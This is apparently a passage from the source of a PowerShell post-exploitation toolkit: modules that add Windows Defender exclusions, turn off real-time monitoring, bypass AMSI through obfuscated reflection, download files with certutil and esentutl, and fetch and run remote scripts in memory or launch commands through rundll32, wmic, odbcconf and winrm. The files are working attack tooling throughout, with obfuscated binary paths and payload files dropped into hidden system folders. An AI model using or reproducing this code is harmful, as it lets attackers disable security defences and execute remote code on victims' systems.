|----------------------------------------------------------------------| 93 | | -DisableRTM | 94 | |----------------------------------------------------------------------| 95 | 96 | [*] Description: Disables Windows Defender Real-Time Monitoring. 97 | (Requires Elevation) 98 | 99 | Note: Will pop an alert to the end user. 100 | 101 | [*] Usage: Invoke-DefenderTools -DisableRtm 102 | 103 | [*] Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 104 | [*] Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 105 | 106 | |----------------------------------------------------------------------| 107 | | -DisableAMSI | 108 | |----------------------------------------------------------------------| 109 | 110 | [*] Description: Disables PowerShell's AMSI Hook 111 | 112 | [*] Usage: Invoke-DefenderTools -DisableAmsi 113 | 114 | [*] Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 115 | [*] Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 116 | 117 | \----------------------------------------------------------------------/ 118 | 119 | "@ 120 | } 121 | elseif ($List -eq $True) { 122 | Write @" 123 | 124 | Invoke-DefenderTools Brief Command Usage: 125 | ----------------------------------------- 126 | Invoke-DefenderTools -GetExcludes 127 | Invoke-DefenderTools -AddExclude -Path C:\temp 128 | Invoke-DefenderTools -DisableRtm 129 | Invoke-DefenderTools -DisableAMSI 130 | 131 | "@ 132 | } 133 | 134 | elseif ($GetExcludes) { 135 | 136 | $h = "`n### Invoke-DefenderTools(GetExcludes) ###`n" 137 | $h 138 | Write "`nPATHS/FILE EXCLUSIONS" 139 | Write "---------------------" 140 | $RegKey = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths') 141 | $RegKey.PSObject.Properties | ForEach-Object { 142 | If($_.Name -like '*:\*'){ 143 | Write $_.Name 144 | } 145 | } 146 | Write "`nPROCESS EXCLUSIONS" 147 | Write "------------------" 148 | $RegKey = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes') 149 | $RegKey.PSObject.Properties | ForEach-Object { 150 | If($_.Name -like '*.*'){ 151 | Write $_.Name 152 | } 153 | } 154 | Write "`nEXTENSION EXCLUSIONS" 155 | Write "--------------------" 156 | $RegKey = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions') 157 | $RegKey.PSObject.Properties | ForEach-Object { 158 | If($_.Name -like '*.*'){ 159 | Write $_.Name 160 | } 161 | } 162 | $h 163 | } 164 | elseif ($AddExclude -and $Path) { 165 | if ($PSVersionTable.PSVersion.Major -eq "2") { 166 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 167 | return 168 | } 169 | 170 | $h = "`n### Invoke-DefenderTools(AddExclude) ###`n" 171 | 172 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 173 | -match "S-1-5-32-544"))) { 174 | $h 175 | Add-MpPreference -ExclusionPath "$path" 176 | Write " [+] Added a Defender exclude path of '$path'!" 177 | $h 178 | } 179 | else { 180 | $h 181 | Write " [!] Not Admin. Must be admin or running as a high-integrity process to add a Defender exclude." 182 | $h 183 | } 184 | } 185 | elseif ($DisableRtm) { 186 | if ($PSVersionTable.PSVersion.Major -eq "2") { 187 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 188 | return 189 | } 190 | 191 | $h = "`n### Invoke-DefenderTools(DisableRtm) ###`n" 192 | 193 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544"))) { 194 | $h 195 | Set-MpPreference -DisableRealTimeMonitoring $true 196 | Write " [+] Successfully disabled Defender's real-time monitoring." 197 | $h 198 | } 199 | else { 200 | $h 201 | Write " [!] Not Admin. Must be admin or running as a high-integrity process to disable Defender's Real-Time Monitoring." 202 | $h 203 | } 204 | } 205 | elseif ($DisableAmsi) { 206 | if ($PSVersionTable.PSVersion.Major -eq "2") { 207 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 208 | return 209 | } 210 | 211 | # https://github.com/jakehomb/AMSI-Exec/blob/master/Invoke-AmsiExec.ps1 212 | # https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ 213 | $h = "`n### Invoke-DefenderTools(DisableAmsi) ###`n" 214 | 215 | if ($([bool](([Ref].Assembly.GetType('System.Management.Automation.A'+'msiUtils').GetField('a'+'msiInitFailed','NonPublic,Static').GetValue($null))))) { 216 | $h 217 | Write " [+] Amsi is already disabled." 218 | $h 219 | } 220 | else { 221 | 222 | Try { 223 | 224 | $a = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076) 225 | 226 | [Ref].Assembly.GetType('System.Management.Automation.A'+'msiUtils').GetField('a'+'msiSession','NonPublic,Static').SetValue($null,$null) 227 | 228 | [Ref].Assembly.GetType('System.Management.Automation.A'+'msiUtils').GetField('a'+'msiContext','NonPublic,Static').SetValue($null, [IntPtr]$a) 229 | 230 | $h 231 | Write " [+] Disabled Amsi." 232 | $h 233 | } 234 | Catch { 235 | $h 236 | Write " [-] An Error has occurred. Unable to disable Amsi." 237 | $h 238 | } 239 | } 240 | } 241 | } -------------------------------------------------------------------------------- /modules/Invoke-Download.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Download { 2 | <# 3 | 4 | .SYNOPSIS 5 | Commands for downloading files to the target system. 6 | 7 | .PARAMETER Help 8 | Shows detailed help for each function. 9 | 10 | .PARAMETER List 11 | Shows summary list of available functions. 12 | 13 | .PARAMETER PsDownload 14 | Downloads a file to the target system using a traditional powershell 'DownloadFile' cradle. 15 | 16 | .PARAMETER CertUtil 17 | Uses certutil.exe to download a file to the target system. Uses the "VerifyCTL" method. 18 | 19 | .PARAMETER Esentutl 20 | Uses Esentutil.exe to download a file from a remote UNC Path. 21 | 22 | .EXAMPLE 23 | PS> Invoke-Download -PsDownload -RemoteFile https://192.168.1.1/file.exe -LocalFile C:\temp\file.exe 24 | 25 | .EXAMPLE 26 | PS> Invoke-Download -CertUtil -RemoteFile http://192.168.1.1/file.exe -LocalFile C:\temp\file.exe 27 | 28 | .EXAMPLE 29 | PS> Invoke-Download -Esentutl -RemoteUNCPath \\192.168.1.1\share\file.exe -LocalFile C:\temp\file.exe 30 | 31 | .NOTES 32 | Author: Fabrizio Siciliano (@0rbz_) 33 | 34 | #> 35 | [CmdletBinding()] 36 | param ( 37 | [Parameter(Position=1)] 38 | [Switch]$Help, 39 | [Switch]$List, 40 | 41 | [Parameter(Mandatory = $False)] 42 | [Switch]$PsDownload, 43 | [String]$RemoteFile, 44 | [String]$LocalFile, 45 | 46 | [Parameter(Mandatory = $False)] 47 | [Switch]$CertUtil, 48 | [String]$LocalFile2=[String]$LocalFile, 49 | [String]$RemoteFile2=[string]$RemoteFile, 50 | 51 | [Parameter(Mandatory = $False)] 52 | [Switch]$EsentUtl, 53 | [String]$RemoteUNCPath, 54 | [String]$LocalFile3=[String]$LocalFile 55 | ) 56 | 57 | if ($Help -eq $True) { 58 | 59 | Write @" 60 | 61 | ### Invoke-Download Help ### 62 | ---------------------------- 63 | Available Invoke-Download Commands: 64 | ----------------------------------- 65 | |-----------------------------------------------------------------------------| 66 | | -PsDownload [-RemoteFile] remote_File [-LocalFile] local_file | 67 | |-----------------------------------------------------------------------------| 68 | 69 | [*] Description: Downloads a file to the target system using a traditional 70 | powershell 'DownloadFile' cradle. 71 | 72 | [*] Usage: Invoke-Download -PsDownload -RemoteFile https://server/File.exe 73 | -LocalFile C:\temp\File.exe 74 | 75 | [*] Mitre ATT&CK Ref: T1105 (Remote File Copy) 76 | 77 | |-----------------------------------------------------------------------------| 78 | | -CertUtil [-RemoteFile] remote_File [-LocalFile] localfile | 79 | |-----------------------------------------------------------------------------| 80 | 81 | [*] Description: Uses certutil.exe to download a file to the target system. 82 | Uses the "VerifyCTL" method. 83 | 84 | [*] Usage: Invoke-Download -CertUtil -RemoteFile http://server/File.exe -LocalFile C:\temp\file.exe 85 | 86 | [*] Mitre ATT&CK Ref: T1105 (Remote File Copy) 87 | 88 | |-----------------------------------------------------------------------------| 89 | | -Esentutl [-RemoteUNCPath] remote_File [-LocalFile] local_file | 90 | |-----------------------------------------------------------------------------| 91 | 92 | [*] Description: Uses Esentutil.exe to download a file from a remote UNC Path. 93 | 94 | [*] Usage: Invoke-Download -Esentutl -RemoteUNCPath \\192.168.1.1\share\file.exe -LocalFile C:\temp\file.exe 95 | 96 | [*] Mitre ATT&CK Ref: T1105 (Remote File Copy) 97 | 98 | \-----------------------------------------------------------------------------/ 99 | 100 | "@ 101 | } 102 | 103 | elseif ($List -eq $True) { 104 | Write @" 105 | 106 | Invoke-Download Brief Command Usage: 107 | ------------------------------------ 108 | Invoke-Download -PsDownload -RemoteFile https://192.168.1.1/file.exe -LocalFile C:\temp\file.exe 109 | Invoke-Download -CertUtil -RemoteFile https://192.168.1.1/file.exe -LocalFile C:\temp\file.exe 110 | Invoke-Download -Esentutl -RemoteUNCPath \\192.168.1.1\share\file.exe -LocalFile C:\temp\file.exe 111 | 112 | "@ 113 | } 114 | 115 | elseif ($PsDownload -and $RemoteFile -and $LocalFile) { 116 | if ($PSVersionTable.PSVersion.Major -eq "2") { 117 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 118 | return 119 | } 120 | $h = "`n### Invoke-Download(PsDownload) ###`n" 121 | 122 | $dl = New-Object System.Net.WebClient 123 | $dl.headers.add("User-Agent", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5") 124 | $dl.downloadfile("$RemoteFile", "$LocalFile") 125 | 126 | if ($(Test-Path -path $LocalFile)) { 127 | $h 128 | Write " [+] File successfully downloaded to $LocalFile" 129 | $h 130 | } 131 | else { 132 | $h 133 | Write " [-] Download failed. Make sure your File exists at $RemoteFile and that $LocalFile is writable and try again." 134 | $h 135 | } 136 | } 137 | elseif ($Certutil -and $RemoteFile -and $LocalFile) { 138 | # https://twitter.com/egre55/status/1087685529016193025 139 | 140 | $RemoteFileName = $RemoteFile.Substring($RemoteFile.LastIndexOf("/") + 1) 141 | (C:\??*?\*3?\?er*ut?l.?x? -f -split -VerifyCTL $RemoteFile) | Out-null 142 | 143 | $LocalFile1 = (Get-Item *.bin).FullName 144 | 145 | Rename-Item $LocalFile1 $RemoteFileName 146 | Move-Item $RemoteFileName $LocalFile -Force 147 | 148 | if ($(Test-Path -path $LocalFile)) { 149 | 150 | Write-Output "`n [+] File downloaded to $LocalFile`n" 151 | } 152 | else { 153 | Write-Output "`n [!] Download Failed.`n" 154 | } 155 | } 156 | elseif ($EsentUtl -and $RemoteUNCPath -and $LocalFile) { 157 | # https://twitter.com/egre55/status/985994639202283520 158 | 159 | if ($(Test-Path -path "C:\windows\system32\esentutl.exe")) { 160 | Try { 161 | 162 | (C:\??*?\*3?\Es*n?U??.?x? /y $RemoteUNCPath /d $LocalFile /o) 163 | 164 | if ($(Test-Path -path $LocalFile)) { 165 | Write "`n [+] File successfully downloaded to $LocalFile`n" 166 | } 167 | } 168 | Catch { 169 | Write "`n [!] Unknown Error.`n" 170 | } 171 | } 172 | if (!$(Test-Path -path "C:\windows\system32\esentutl.exe")) { 173 | Write "`n [!] Can't find esentutil.exe in its usual location. Unable to download file.`n" 174 | } 175 | } 176 | } -------------------------------------------------------------------------------- /modules/Invoke-Execute.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Execute { 2 | <# 3 | 4 | .SYNOPSIS 5 | Execute commands on a target system using a number of different "living-off-the-land" techniques. 6 | 7 | .PARAMETER Help 8 | Shows detailed help for each function. 9 | 10 | .PARAMETER List 11 | Shows summary list of available functions. 12 | 13 | .PARAMETER DownloadString 14 | Executes a remote powershell script in memory using Net.WebClient DownloadString Method. 15 | 16 | .PARAMETER XmlHTTP 17 | Executes a remote powershell script in memory using Msxml2.XMLHTTP COM Object. 18 | 19 | .PARAMETER Rundll 20 | Executes a local DLL/EXE (or command) using rundll32 with a number of different methods. 21 | 22 | .PARAMETER WmicExec 23 | Executes a local command via "wmic process call create". 24 | 25 | .PARAMETER WmicXSL 26 | Utilizes wmic process get brief to execute a built-in XSL file containing a JScript ActiveXObject command. 27 | 28 | .PARAMETER OdbcExec 29 | Uses odbcconf.exe to execute a local DLL or DLL at a UNC path. 30 | 31 | .PARAMETER WinRmWmi 32 | Executes a command from a built-in XML file via winrm.vbs. 33 | 34 | .PARAMETER SignedProxyDll 35 | Executes a DLL via an existing signed binary. 36 | 37 | Available SignedProxyDll Methods: 38 | 39 | [1] AdobeARM.exe 40 | 41 | .PARAMETER SignedProxyExe 42 | Executes an EXE via an existing signed binary. 43 | 44 | Available SignedProxyExe Methods: 45 | 46 | [1] pcalua.exe 47 | [2] SynTPEnh.exe 48 | 49 | .EXAMPLE 50 | Invoke-Execute -RunDll -Method 1 -File C:\temp\File.dll 51 | Invoke-Execute -RunDll -Method 5 -File 'cmd.exe /c net user....' 52 | 53 | Available RunDLL Methods: 54 | 55 | [1] shell32.dll,Control_RunDLL (DLL or CPL) 56 | [2] shell32.dll,Control_RunDLLA (DLL or CPL) 57 | [3] IEAdvpack.dll,RegisterOCX (DLL or EXE or COMMAND) 58 | [4] zipfldr.dll,RouteTheCall (EXE) 59 | [5] advpack.dll,RegisterOCX (DLL or EXE or COMMAND) 60 | [6] pcwutl.dll,LaunchApplication (EXE) 61 | 62 | .EXAMPLE 63 | Invoke-Execute -OdbcExec -Dll \\server\share\File.dll 64 | 65 | .EXAMPLE 66 | Invoke-Execute -WinRmWmi -Command "cmd.exe /c net user...." 67 | 68 | .EXAMPLE 69 | Invoke-Execute -SignedProxyExe -Method 1 -Exe C:\temp\file.exe 70 | 71 | .EXAMPLE 72 | Invoke-Execute -XmlHTTP -PsUrl http://192.168.1.1/script.ps1 73 | 74 | .NOTES 75 | Author: Fabrizio Siciliano (@0rbz_) 76 | 77 | #> 78 | 79 | [CmdletBinding()] 80 | param ( 81 | [Parameter(Position=1)] 82 | [Switch]$Help, 83 | [Switch]$List, 84 | 85 | [Parameter(Mandatory = $False)] 86 | [Switch]$DownloadString, 87 | [String]$PsUrl, 88 | 89 | [Parameter(Mandatory = $False)] 90 | [Switch]$XmlHTTP, 91 | [String]$PsUrl2=[String]$PsUrl, 92 | 93 | [Parameter(Mandatory = $False)] 94 | [Switch]$Rundll, 95 | [String]$Method, 96 | [string]$File, 97 | 98 | [Parameter(Mandatory = $False)] 99 | [Switch]$WmicExec, 100 | [string]$Command, 101 | 102 | [Parameter(Mandatory = $False)] 103 | [Switch]$WmicXSL, 104 | [string]$command2=[string]$command, 105 | 106 | [Parameter(Mandatory = $False)] 107 | [Switch]$OdbcExec, 108 | [string]$Dll, 109 | 110 | [Parameter(Mandatory = $False)] 111 | [Switch]$WinRmWmi, 112 | [string]$Command3=[string]$Command, 113 | 114 | [Parameter(Mandatory = $False)] 115 | [Switch]$SignedProxyDll, 116 | [String]$Method2=[String]$Method, 117 | [String]$Dll2=[string]$Dll, 118 | 119 | [Parameter(Mandatory = $False)] 120 | [Switch]$SignedProxyExe, 121 | [String]$Method3=[String]$Method, 122 | [String]$Exe 123 | 124 | ) 125 | $DataDirs = @( 126 | ("C:\ProgramData\Intel"), 127 | ("C:\ProgramData\Microsoft\Crypto\SystemKeys"), 128 | ("C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys"), 129 | ("C:\ProgramData\Microsoft\Crypto\SystemKeys"), 130 | ("C:\ProgramData\Microsoft\Diagnosis"), 131 | ("C:\ProgramData\Microsoft\Diagnosis\FeedbackHub"), 132 | ("C:\ProgramData\Microsoft\Diagnosis\Scripts"), 133 | ("C:\ProgramData\Microsoft\Network\Downloader"), 134 | ("C:\ProgramData\Microsoft\Search\Data"), 135 | ("C:\ProgramData\Microsoft\Search\Data\Applications"), 136 | ("C:\ProgramData\Microsoft\Search\Data\Temp"), 137 | ("C:\ProgramData\Microsoft\Windows\WER\ReportArchive"), 138 | ("C:\ProgramData\Microsoft\Windows\WER\ReportQueue"), 139 | ("C:\ProgramData\Microsoft\Windows\WER\Temp"), 140 | ("C:\ProgramData\WindowsHolographicDevices"), 141 | ("C:\Users\Public\Libraries"), 142 | ("C:\Users\Public\AccountPictures"), 143 | ("C:\Users\Public\Documents"), 144 | ("C:\Users\Public\Downloads"), 145 | ("C:\Users\Public\Music"), 146 | ("C:\Users\Public\Pictures"), 147 | ("C:\Users\Public\Videos"), 148 | ("C:\Users\Public\Roaming"), 149 | ("C:\Windows\debug\WIA"), 150 | ("C:\Windows\ServiceProfiles\LocalService"), 151 | ("C:\Windows\ServiceProfiles\LocalService\AppData"), 152 | ("C:\Windows\ServiceProfiles\LocalService\AppData\Local"), 153 | ("C:\Windows\ServiceProfiles\LocalService\AppData\LocalLow"), 154 | ("C:\Windows\Temp"), 155 | ("C:\windows\system32\config"), 156 | ("C:\Windows\System32\LogFiles\WMI"), 157 | ("C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys") 158 | ) 159 | 160 | $NewArray = foreach ($datadir in $datadirs) { 161 | if (Test-Path $datadir) { 162 | @($datadir) 163 | } 164 | } 165 | $datadir = ($newarray[(get-random -Maximum ([array]$newarray).count)]) 166 | 167 | $Rs1 = (-join ((65..90) + (97..122) | Get-Random -Count 13 | foreach {[char]$_})) 168 | $Rs2 = (-join ((65..90) + (97..122) | Get-Random -Count 11 | foreach {[char]$_})) 169 | $Rs3 = (-join ((65..90) + (97..122) | Get-Random -Count 9 | foreach {[char]$_})) 170 | 171 | if ($Help) { 172 | 173 | Write @" 174 | 175 | ### Invoke-Execute Help ### 176 | --------------------------- 177 | Available Invoke-Execute Commands: 178 | ---------------------------------- 179 | |----------------------------------------------------------------------------| 180 | | -DownloadString [-PsUrl] url | 181 | |----------------------------------------------------------------------------| 182 | 183 | [*] Description: Executes a remote powershell script in memory 184 | using Net.WebClient DownloadString Method. 185 | 186 | [*] Usage: Invoke-Execute -DownloadString -PsUrl http://server/script.ps1 187 | 188 | [*] Mitre ATT&CK Ref: T1086 (PowerShell) 189 | 190 | |----------------------------------------------------------------------------| 191 | | -XmlHTTP [-PsUrl] url | 192 | |----------------------------------------------------------------------------| 193 | 194 | [*] Description: Executes a remote powershell script in memory using 195 | Msxml2.XMLHTTP COM Object. 196 | 197 | [*] Usage: Invoke-Execute -XmlHTTP -PsUrl http://server/script.ps1 198 | 199 | [*] Mitre ATT&CK Ref: T1086 (PowerShell) 200 | 201 | |----------------------------------------------------------------------------| 202 | | -RunDLL [-Method] num [-File] path_to_dll | 203 | |----------------------------------------------------------------------------| 204 | 205 | [*] Description: Executes a local DLL/EXE (or command) using 206 | rundll32 with a number of different methods. 207 | 208 | [*] Usage: Invoke-Execute -RunDll -Method 1 -File C:\temp\File.dll 209 | [*] Usage: Invoke-Execute -RunDll -Method 5 -File 'cmd.exe /c net user....' 210 | 211 | Available RunDLL Methods: 212 | 213 | [1] shell32.dll,Control_RunDLL (DLL or CPL) 214 | [2] shell32.dll,Control_RunDLLA (DLL or CPL) 215 | [3] IEAdvpack.dll,RegisterOCX (DLL or EXE or COMMAND) 216 | [4] zipfldr.dll,RouteTheCall (EXE) 217 | [5] advpack.dll,RegisterOCX (DLL or EXE or COMMAND) 218 | [6] pcwutl.dll,LaunchApplication (EXE) 219 | 220 | [*] Mitre ATT&CK Ref: T1085 (Rundll32) 221 | 222 | |----------------------------------------------------------------------------| 223 | | -WmicExec [-Command] "cmd.exe /c net user..." | 224 | |----------------------------------------------------------------------------| 225 | 226 | [*] Description: Executes a local command via wmic process call 227 | create. 228 | 229 | [*] Usage: Invoke-Execute -WmicExec -Command "cmd.exe /c net user..." 230 | 231 | [*] Mitre ATT&CK Ref: T1047 (Windows Management Instrumentation) 232 | 233 | |----------------------------------------------------------------------------| 234 | | -WmicXsl [-Command] "cmd.exe /c net user..." | 235 | |----------------------------------------------------------------------------| 236 | 237 | [*] Description: Utilizes wmic process get brief to execute a built-in XSL 238 | file containing a JScript ActiveXObject command. 239 | 240 | [*] Usage: Invoke-Execute -WmicXsl -Command "cmd.exe /c net user..." 241 | 242 | [*] Mitre ATT&CK Ref: T1220 (XSL Script Processing) 243 | 244 | |----------------------------------------------------------------------------| 245 | | -OdbcExec [-Dll] path_to_dll | 246 | |----------------------------------------------------------------------------| 247 | 248 | [*] Description: Uses odbcconf.exe to execute a local DLL or DLL 249 | at a UNC path. 250 | 251 | [*] Usage: Invoke-Execute -OdbcExec -Dll \\server\share\File.dll 252 | [*] Usage: Invoke-Execute -OdbcExec -Dll C:\temp\File.dll 253 | 254 | [*] Mitre ATT&CK Ref: T1085 (Rundll32) 255 | 256 | |----------------------------------------------------------------------------| 257 | | -WinRmWmi [-Command] "cmd /c net user ..." | 258 | |----------------------------------------------------------------------------| 259 | 260 | [*] Description: Executes a command from a built-in XML file via winrm.vbs. 261 | 262 | [*] Usage: Invoke-Execute -WinRmWmi -Command cmd.exe 263 | [*] Usage: Invoke-Execute -WinRmWmi -Command "cmd.exe /c net user...." 264 | 265 | [*] Mitre ATT&CK Ref: T1028 (Windows Remote Management) 266 | 267 | |----------------------------------------------------------------------------| 268 | | -SignedProxyDll [-Method] num [-Dll] file.dll | 269 | |----------------------------------------------------------------------------| 270 | 271 | [*] Description: Executes a DLL via an existing signed binary. 272 | 273 | [*] Usage: Invoke-Execute -SignedProxyDll -Method 1 -Dll C:\temp\file.dll 274 | 275 | Available SignedProxyDll Methods 276 | 277 | [1] AdobeARM.exe 278 | 279 | [*] Mitre ATT&CK Ref: T1218 (Signed Binary Proxy Execution) 280 | 281 | |----------------------------------------------------------------------------| 282 | | -SignedProxyExe [-Method] num [-Exe] file.exe | 283 | |----------------------------------------------------------------------------| 284 | 285 | [*] Description: Executes an EXE via an existing signed binary. 286 | 287 | [*] Usage: Invoke-Execute -SignedProxyExe -Method 1 -Exe C:\temp\file.exe 288 | 289 | Available SignedProxyExe Methods: 290 | 291 | [1] pcalua.exe 292 | [2] SynTPEnh.exe 293 | 294 | [*] Mitre ATT&CK Ref: T1218 (Signed Binary Proxy Execution) 295 | 296 | \-----------------------------------------------------------------------------/ 297 | 298 | "@ 299 | } 300 | 301 | elseif ($List -eq $True) { 302 | Write @" 303 | 304 | Invoke-Execute Brief Command Usage: 305 | ----------------------------------- 306 | Invoke-Execute -DownloadString -PsUrl http://server/script.ps1 307 | Invoke-Execute -XmlHTTP -PsUrl http://server/script.ps1 308 | Invoke-Execute -RunDll -Method 1,2,3,4,5,6 -File 'cmd.exe /c net user....' 309 | Invoke-Execute -WmicExec -Command "cmd.exe /c net user..." 310 | Invoke-Execute -WmicXsl -Command "cmd.exe /c net user..." 311 | Invoke-Execute -OdbcExec -Dll \\server\share\File.dll 312 | Invoke-Execute -WinRmWmi -Command "cmd.exe /c net user...." 313 | Invoke-Execute -SignedProxyDll -Method 1 -Dll C:\temp\file.dll 314 | Invoke-Execute -SignedProxyExe -Method 1,2 -Exe C:\temp\file.exe 315 | 316 | "@ 317 | } 318 | 319 | elseif ($DownloadString -and $PsUrl) { 320 | if ($PSVersionTable.PSVersion.Major -eq "2") { 321 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 322 | return 323 | } 324 | $h = "`n### Invoke-Execute(DownloadString) ###`n" 325 | Try { 326 | 327 | $dl = New-Object System.Net.WebClient 328 | $dl.headers.add("User-Agent", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5") 329 | Invoke-Expression $dl.DownloadString($PsUrl) 330 | $h 331 | Write " [+] Executed the following powershell script in memory: $PsUrl" 332 | $h 333 | } 334 | Catch { 335 | $h 336 | Write "`n [!] Unknown Error.`n" 337 | $h 338 | } 339 | } 340 | elseif ($XmlHTTP -and $PsUrl) { 341 | # https://gist.github.com/HarmJ0y/bb48307ffa663256e239 342 | $h = "`n### Invoke-Execute(XmlHTTP) ###`n" 343 | Try { 344 | $Dl = (New-Object -ComObject Msxml2.XMLHTTP) 345 | $Dl.open('GET',"$PsUrl",$false) 346 | $Dl.send() 347 | Invoke-Expression $Dl.responseText 348 | $h 349 | Write " [+] Executed the following powershell script in memory: $PsUrl" 350 | $h 351 | } 352 | Catch { 353 | $h 354 | Write "`n [!] Unknown Error.`n" 355 | $h 356 | } 357 | } 358 | elseif ($RunDll -and $Method -eq 1 -and $File) { 359 | # https://www.thewindowsclub.com/rundll32-shortcut-commands-windows 360 | # https://twitter.com/mattifestation/status/776574940128485376 361 | $h = "`n### Invoke-Execute(rundll) ###`n" 362 | (C:\??*?\*3?\?un?l*3?.?x? C:\$rs2\..\$rs1\..\..\..\windows\system32\shell32.dll,Control_RunDLL $File) 363 | $h 364 | Write " [+] Executed: rundll32.exe shell32.dll,Control_RunDLL $File" 365 | $h 366 | } 367 | elseif ($Rundll -and $Method -eq 2 -and $File) { 368 | # https://www.thewindowsclub.com/rundll32-shortcut-commands-windows 369 | # https://twitter.com/Hexacorn/status/885258886428725250 370 | $h = "`n### Invoke-Execute(rundll) ###`n" 371 | (C:\??*?\*3?\?un?l*3?.?x? C:\$rs2\..\..\..\windows\system32\shell32.dll,Control_RunDLLA $File) 372 | $h 373 | Write " [+] Executed: rundll32.exe shell32.dll,Control_RunDLLA $File" 374 | $h 375 | } 376 | elseif ($Rundll -and $Method -eq 3 -and $File) { 377 | # https://twitter.com/0rbz_/status/974472392012689408 378 | $h = "`n### Invoke-Execute(rundll) ###`n" 379 | (C:\??*?\*3?\?un?l*3?.?x? C:\$rs2\..\..\..\windows\system32\IEAdvpack.dll,RegisterOCX $File) 380 | $h 381 | Write " [+] Executed: rundll32.exe IEAdvpack.dll,RegisterOCX $File" 382 | $h 383 | } 384 | elseif ($Rundll -and $Method -eq 4 -and $File) { 385 | # https://twitter.com/Moriarty_Meng/status/977848311603380224 386 | $h = "`n### Invoke-Execute(rundll) ###`n" 387 | (C:\??*?\*3?\?un?l*3?.?x? C:\$rs2\..\..\..\windows\system32\zipfldr.dll,RouteTheCall $File) 388 | $h 389 | Write " [+] Executed: rundll32.exe zipfldr.dll,RouteTheCall $File" 390 | $h 391 | } 392 | elseif ($Rundll -and $Method -eq 5 -and $File) { 393 | # https://twitter.com/bohops/status/977891963763675141 394 | $h = "`n### Invoke-Execute(rundll) ###`n" 395 | (C:\??*?\*3?\?un?l*3?.?x? C:\$rs2\..\..\..\windows\system32\advpack.dll,RegisterOCX $File) 396 | $h 397 | Write " [+] Executed: rundll32.exe advpack.dll,RegisterOCX $File" 398 | $h 399 | } 400 | elseif ($Rundll -and $Method -eq 6 -and $File) { 401 | # https://twitter.com/harr0ey/status/989617817849876488 402 | # https://windows10dll.nirsoft.net/pcwutl_dll.html 403 | $h = "`n### Invoke-Execute(rundll) ###`n" 404 | (C:\??*?\*3?\?un?l*3?.?x? C:\$rs2\..\..\..\windows\system32\pcwutl.dll,LaunchApplication $File) 405 | $h 406 | Write " [+] Executed: rundll32.exe pcwutl.dll,LaunchApplication $File" 407 | $h 408 | } 409 | 410 | elseif ($WmicExec -and $Command) { 411 | Try { 412 | $h = "`n### Invoke-Execute(WmicExec) ###`n" 413 | $h 414 | (C:\??*?\*3?\?b?m\?m*c.?x? process call create $command) 415 | Write " `n [+] Command executed: $command" 416 | $h 417 | } 418 | Catch { 419 | 420 | Write " [!] Error." 421 | $h 422 | } 423 | } 424 | 425 | elseif ($WmicXSL -and $Command) { 426 | # https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html 427 | 428 | Try { 429 | $h = "`n### Invoke-Execute(WmicXSL) ###`n" 430 | $XslFileContent = @" 431 | 432 | 436 | 437 | 438 | 441 | 442 | "@ 443 | $h 444 | $XslFile = "$DataDir\$rs3.xsl" 445 | $WmicArgs = "/format:" 446 | (Set-Content -Path $XslFile -Value $XslFileContent) 447 | (C:\??*?\*3?\?b?m\?m*c.?x? process get brief $WmicArgs"`"$XslFile"`") 448 | Remove-Item $XslFile 449 | Write " [+] Command Executed: $command" 450 | $h 451 | } 452 | Catch { 453 | Write " [!] Unknown Error. Check that WMIC is present on the target." 454 | } 455 | } 456 | 457 | elseif ($OdbcExec -and $Dll) { 458 | $h ="`n### Invoke-Execute(OdbcExec) ###`n" 459 | if ($(Test-Path "C:\??*?\*3?\?*co?f.?x?")) { 460 | $h 461 | (C:\??*?\*3?\?*co?f.?x? /a `{REGSVR $Dll`}) 462 | Write " Executed Command: odbcconf.exe /a {REGSVR $Dll}" 463 | $h 464 | } 465 | else { 466 | $h 467 | Write "$env:windir\odbcconf.exe not found. Can't execute this module." 468 | $h 469 | return 470 | } 471 | } 472 | 473 | elseif ($WinRmWmi -and $Command) { 474 | # https://twitter.com/harr0ey/status/1062468588299345920 475 | # https://lolbas-project.github.io/lolbas/Scripts/Winrm/ 476 | $h = "`n### Invoke-Execute(WinRmWmi) ###`n" 477 | 478 | if ($(Get-Service -Name winrm | Select-Object -ExpandProperty status) -eq "Stopped") { 479 | $h 480 | Write "WinRM Service isn't running. If you're admin, try starting the WinRM Service with the 'winrm quickconfig' command." 481 | $h 482 | return 483 | } 484 | if ($(Get-Service -Name winrm | Select-Object -ExpandProperty status) -eq "Running" -and $(Test-Path C:\??*?\*3?\w?nr?.v?s)) { 485 | 486 | $XmlFileContent = @" 487 | 488 | 489 | $Command 490 | C:\ 491 | 492 | "@ 493 | $h 494 | $XmlFile = "$DataDir\$rs1" 495 | (Set-Content -Path $XmlFile -Value $XmlFileContent) 496 | 497 | (C:\??*?\*3?\c?c*i?t.?x? C:\$rs2\..\..\..\windows\system32\winrm.vbs i c wmicimv2/Win32_Process -SKipCAcheCk -SkIpCNchEck -file:$XmlFile) 498 | 499 | Remove-Item $XmlFile 500 | Write " Command Executed: $command" 501 | $h 502 | } 503 | else { 504 | $h 505 | Write "Couldn't find 